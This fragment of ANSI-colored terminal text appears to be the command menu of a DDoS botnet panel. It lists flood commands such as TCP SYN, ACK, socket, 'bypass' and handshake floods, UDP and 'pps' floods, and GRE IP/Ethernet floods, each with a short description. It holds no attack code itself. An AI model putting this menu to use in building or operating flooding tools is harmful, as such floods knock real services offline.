\x1b[0m
      \x1b[38;5;49m!\x1b[97msyn        \x1b[4;38;5;49mtcp syn flood\x1b[0m
      \x1b[38;5;49m!\x1b[97mack        \x1b[4;38;5;49mtcp ack flood\x1b[0m
      \x1b[38;5;49m!\x1b[97msocket     \x1b[4;38;5;49mtcp socket flood\x1b[0m
      \x1b[38;5;49m!\x1b[97mtcpbypass  \x1b[4;38;5;49mtcp bypass flood\x1b[0m
      \x1b[38;5;49m!\x1b[97mtcplegit   \x1b[4;38;5;49mtcp legit flood\x1b[0m  
      \x1b[38;5;49m!\x1b[97mstomp      \x1b[4;38;5;49mtcp handshake + ack/psh\x1b[0m

      \x1b[38;5;49m!\x1b[97mudp        \x1b[4;38;5;49mgeneric udp flood\x1b[0m
      \x1b[38;5;49m!\x1b[97mstd        \x1b[4;38;5;49mstd flood\x1b[0m
      \x1b[38;5;49m!\x1b[97mudpplain   \x1b[4;38;5;49mudp flood with fewer options\x1b[0m
      \x1b[38;5;49m!\x1b[97mpudp       \x1b[4;38;5;49mudp flood intended for more pps\x1b[0m

      \x1b[38;5;49m!\x1b[97mgreip      \x1b[4;38;5;49mlayer3 gre ip flood\x1b[0m
      \x1b[38;5;49m!\x1b[97mgreeth     \x1b[4;38;5;49mlayer3 gre eth flood\x1b[0m
\x1b[0m